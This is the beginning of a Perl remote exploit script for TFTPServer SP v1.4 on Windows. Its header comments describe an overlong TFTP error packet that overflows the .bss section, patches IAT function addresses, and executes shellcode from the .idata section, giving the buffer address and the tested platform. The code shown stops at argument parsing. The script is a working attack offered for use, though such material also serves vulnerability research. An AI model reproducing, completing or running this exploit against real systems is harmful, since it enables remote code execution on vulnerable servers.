TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <tixxdz@gmail.com>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict;
use IO::Socket::INET;
my $target = shift ||
die "Usage: $0 <target> <type>\n <type> : type of the program\n".
"\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";